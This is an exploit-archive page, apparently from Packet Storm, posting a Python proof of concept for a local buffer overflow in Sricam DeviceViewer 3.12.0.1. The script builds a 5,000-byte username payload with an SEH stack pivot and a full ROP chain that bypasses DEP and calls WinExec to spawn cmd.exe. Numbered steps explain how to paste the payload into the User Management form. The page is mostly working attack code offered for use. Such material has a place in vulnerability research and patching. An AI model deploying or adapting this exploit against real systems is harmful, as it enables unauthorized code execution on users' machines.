what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

DeviceViewer 3.12.0.1 Local Buffer Overflow

DeviceViewer 3.12.0.1 Local Buffer Overflow
Posted Oct 9, 2019
Authored by Alessandro Magnosi, Alessandro Magnosiu

DeviceViewer version 3.12.0.1 add user local buffer overflow exploit with DEP bypass.

tags | exploit, overflow, local
SHA-256 | 368ec8b9c07786240ec744cb729189efde9a47a5d8025ff106bf73cbcdfda26c

DeviceViewer 3.12.0.1 Local Buffer Overflow

Change Mirror Download
# Exploit Title: Sricam DeviceViewer 3.12.0.1 - 'add user' Local Buffer Overflow (DEP Bypass)
# Date: 08/10/2019
# Exploit Author: Alessandro Magnosi
# Vendor Homepage: http://www.sricam.com/
# Software Link: http://download.sricam.com/Manual/DeviceViewer.exe
# Version: v3.12.0.1
# Exploit type: Local
# Tested on: Windows 7 SP1

# Steps to reproduce:
# 1. Get the WinExec address from arwin.exe kernel32.dll WinExec
# 2. Change the related address in the PoC
# 3. Generate the payload using the PoC
# 4. Log in the Sricam DeviceViewer application
# 5. Go to System Configuration -> User Management
# 6. Put the content of the generated file in User Info -> Username
# 7. Click on Add
# 8. A command shell will appear

#!/usr/bin/python

from struct import pack, unpack

def create_rop_chain():

rops = [

0x6a1142aa, # XOR EDX,EDX # RETN

0x6a569810, # POP EDX # RETN [avcodec-54.dll]
0x6ae9c126, # &Writable location [avutil-50.dll]

0x6a5dac8a, # POP EAX # RETN
0xff9b929d, # NEG "cmd\0"

0x6a2420e8, # NEG EAX # RETN [avcodec-54.dll]

0x6994766b, # PUSH EAX # MOV DWORD PTR DS:[EDX],EAX # ADD ESP,3C # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avformat-54.dll]
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP

0x6a18e062, # ADD ESP, 10 # RETN ---> ESI
0x6a2420ea, # ROP NOP ---> EDI

0x6a45e446, # XCHG EAX,EDX # RETN [avcodec-54.dll]
0x6a29d716, # XCHG EAX,ECX # RETN [avcodec-54.dll]

## ECX = ascii "cmd\0"

0x6a569810, # POP EDX # RETN [avcodec-54.dll]
0x6a36264a, # CALL EBX

## EDX = CALL EBX

0x6a5dac8a, # POP EAX # RETN
0x76e33231, # ptr to WinExec() [kernel32.dll]
#### Unfortunately, this has to be hardcoded as no reliable pointer is available into the aplication

0x6a150411, # XCHG EAX,EBX # RETN [avcodec-54.dll]

## EBX = &WinExec

0x6a5dac8a, # POP EAX # RETN
0xffffffff, # -0x00000001-> ebx
0x6a2420e8, # NEG EAX # RETN [avcodec-54.dll]

## EAX = 1

0x6a5eb992, # PUSHAD # RETN [avcodec-54.dll]
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
0x6a2420ea, # ROP NOP
]
return ''.join(pack('<I', _) for _ in rops)


def nops(length):
return "\x90" * length

rop_chain = create_rop_chain()
maxlen = 5000

# Stack pivoting address
# 0x6a443e58 : {pivot 2252 / 0x8cc} : # ADD ESP,8BC # POP EBX # POP ESI # POP EDI # POP EBP # RETN [avcodec-54.dll]
seh = pack("<I", 0x6a443e58)

# Don't care nseh
nseh = nops(4)

payload = nops(8) + rop_chain + nops(360 - len(rop_chain) - 8) + nops(20) + nseh + seh + nops(300)
sec = maxlen - len(payload)
payload += nops(sec) # More junk to reach 5000

print("Exploit Length: " + str(len(payload)))

try:
fname = "exprop.txt"
exploit = open(fname,"w")
print("Sricam DeviceViewer 3.12.0.1 Local Buffer Overflow Exploit")
print("Author: Alessandro Magnosi\n")
print("[*] Creating evil username")
exploit.write(payload)
exploit.close()
print("[+] Username file created\n")
print("[i] Now go to 'User Management' and try to add a user with user=<filecontent>")
print("[+] A command shell will open")
except:
print("[!] Error creating the file")
Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    26 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    18 Files
  • 21
    Jun 21st
    8 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close